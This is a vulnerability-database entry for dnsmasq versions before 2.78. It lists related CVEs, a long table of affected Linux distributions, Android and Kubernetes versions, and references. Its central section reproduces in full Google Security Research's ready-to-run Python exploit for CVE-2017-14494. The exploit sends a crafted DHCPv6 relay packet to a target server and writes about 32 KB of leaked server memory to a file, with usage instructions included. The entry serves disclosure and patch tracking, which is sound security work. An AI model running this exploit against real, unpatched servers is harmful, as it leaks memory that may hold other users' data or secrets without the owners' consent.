ID
VAR-E-201710-0038
CVE
cve_id: | CVE-2017-14494 | Trust: 1.8 |
cve_id: | CVE-2017-14495 | Trust: 0.8 |
cve_id: | CVE-2017-14493 | Trust: 0.8 |
cve_id: | CVE-2017-14492 | Trust: 0.8 |
cve_id: | CVE-2017-14496 | Trust: 0.8 |
cve_id: | CVE-2017-14491 | Trust: 0.8 |
cve_id: | CVE-2017-13704 | Trust: 0.3 |
EDB ID
42944
TITLE
Dnsmasq < 2.78 - Information Leak - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
Dnsmasq < 2.78 - Information Leak. CVE-2017-14494 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dnsmasq | model: | - | scope: | lt | version: | 2.78 | Trust: 4.6 |
vendor: | redhat | model: | enterprise linux server year extended update support | scope: | eq | version: | -47.4 | Trust: 0.6 |
vendor: | dnsmasq | model: | lack of free | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | stack-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | integer underflow | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | 2-byte heap-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | heap-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | ubuntu | model: | linux | scope: | eq | version: | 17.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 16.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 14.04 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.2.2 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.77 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.75 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.72 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.71 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.70 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.7 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.65 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.64 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.63 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.62 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.61 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.60 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.59 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.58 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.57 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.56 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.55 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.54 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.53 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.52 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.51 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.50 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.49 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.48 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.47 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.46 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.45 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.44 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.43 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.42 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.41 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.40 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.4 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.38 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.37 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.36 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.35 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.34 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.33 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.30 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.29 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.28 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.27 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.26 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.25 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.24 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.23 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.22 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.21 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.20 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.19 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.18 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.17 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.16 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.15 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.14 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.13 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.12 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.11 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.10 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.9 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.8 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.18 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.17 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.16 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.15 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.14 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.13 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.12 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.11 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.10 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.996 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.992 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.98 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.96 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.95 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.7 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.5 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.4 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.2 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server for arm | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update suppor | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server year extended update support | scope: | eq | version: | -47.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server year extended upd | scope: | eq | version: | -47.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux long life server | scope: | eq | version: | 5.9 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for scientific computing | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update supp | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update suppo | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update suppo | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | oracle | model: | linux | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | oracle | model: | linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | opensuse | model: | leap | scope: | eq | version: | 42.3 | Trust: 0.3 |
vendor: | opensuse | model: | leap | scope: | eq | version: | 42.2 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.7.6 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.6.10 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.5.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | model: | android | scope: | eq | version: | 7.1.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 6.0.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 5.1.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 5.0.2 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 4.4.4 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 8.0 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 7.1.2 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 7.0 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 6.0 | Trust: 0.3 | |
vendor: | fedoraproject | model: | fedora | scope: | eq | version: | 27 | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-30 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | ne | version: | 2.78 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.8 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.7.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.6.11 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.5.8 | Trust: 0.3 |
EXPLOIT
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
Sadly, there are no easy docker setup instructions available.
Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Information Leak
Trust: 1.6
TAGS
tag: | exploit | Trust: 3.0 |
tag: | overflow | Trust: 1.5 |
tag: | denial of service | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2017-14494 | Trust: 3.0 |
db: | EXPLOIT-DB | id: | 42944 | Trust: 1.6 |
db: | NVD | id: | CVE-2017-14495 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14493 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14492 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14496 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14491 | Trust: 0.8 |
db: | 0DAYTODAY | id: | 28724 | Trust: 0.6 |
db: | EDBNET | id: | 94654 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28727 | Trust: 0.6 |
db: | EDBNET | id: | 94657 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28726 | Trust: 0.6 |
db: | EDBNET | id: | 94656 | Trust: 0.6 |
db: | EDBNET | id: | 94398 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28725 | Trust: 0.6 |
db: | EDBNET | id: | 94655 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28723 | Trust: 0.6 |
db: | EDBNET | id: | 94653 | Trust: 0.6 |
db: | PACKETSTORM | id: | 144468 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144473 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144462 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144471 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144480 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144479 | Trust: 0.5 |
db: | NVD | id: | CVE-2017-13704 | Trust: 0.3 |
db: | CERT/CC | id: | VU#973527 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-17-332-01 | Trust: 0.3 |
db: | BID | id: | 101085 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14494 | Trust: 1.5 |
url: | https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/cve-2017-14494.py | Trust: 1.0 |
url: | https://0day.today/exploits/28724 | Trust: 0.6 |
url: | https://0day.today/exploits/28727 | Trust: 0.6 |
url: | https://0day.today/exploits/28726 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/42944/ | Trust: 0.6 |
url: | https://0day.today/exploits/28725 | Trust: 0.6 |
url: | https://0day.today/exploits/28723 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14495 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14493 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14496 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14491 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14492 | Trust: 0.5 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14492.py | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14495 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14494.py | Trust: 0.3 |
url: | https://access.redhat.com/errata/rhsa-2017:2836 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14491 | Trust: 0.3 |
url: | https://source.android.com/security/bulletin/2017-10-01 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-17-332-01 | Trust: 0.3 |
url: | https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495411 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495510 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14494 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14496.py | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495409 bug 1495409 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/973527 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495410 | Trust: 0.3 |
url: | https://www.debian.org/security/2017/dsa-3989 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-13704 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14492 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495416 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14496 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495415 | Trust: 0.3 |
url: | http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.601472 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14493 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14493.py | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14491.py | Trust: 0.3 |
url: | http://www.thekelleys.org.uk/dnsmasq/doc.html | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495412 | Trust: 0.3 |
url: | https://access.redhat.com/errata/rhsa-2017:2837 | Trust: 0.3 |
url: | http://www.thekelleys.org.uk/dnsmasq/changelog | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14495.py | Trust: 0.3 |
url: | https://github.com/kubernetes/kubernetes/blob/master/changelog.md | Trust: 0.3 |
SOURCES
db: | BID | id: | 101085 |
db: | PACKETSTORM | id: | 144468 |
db: | PACKETSTORM | id: | 144473 |
db: | PACKETSTORM | id: | 144462 |
db: | PACKETSTORM | id: | 144471 |
db: | PACKETSTORM | id: | 144480 |
db: | PACKETSTORM | id: | 144479 |
db: | EXPLOIT-DB | id: | 42944 |
db: | EDBNET | id: | 94654 |
db: | EDBNET | id: | 94657 |
db: | EDBNET | id: | 94656 |
db: | EDBNET | id: | 94398 |
db: | EDBNET | id: | 94655 |
db: | EDBNET | id: | 94653 |
LAST UPDATE DATE
2024-03-21T15:11:49.924000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 101085 | date: | 2017-10-02T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 101085 | date: | 2017-10-02T00:00:00 |
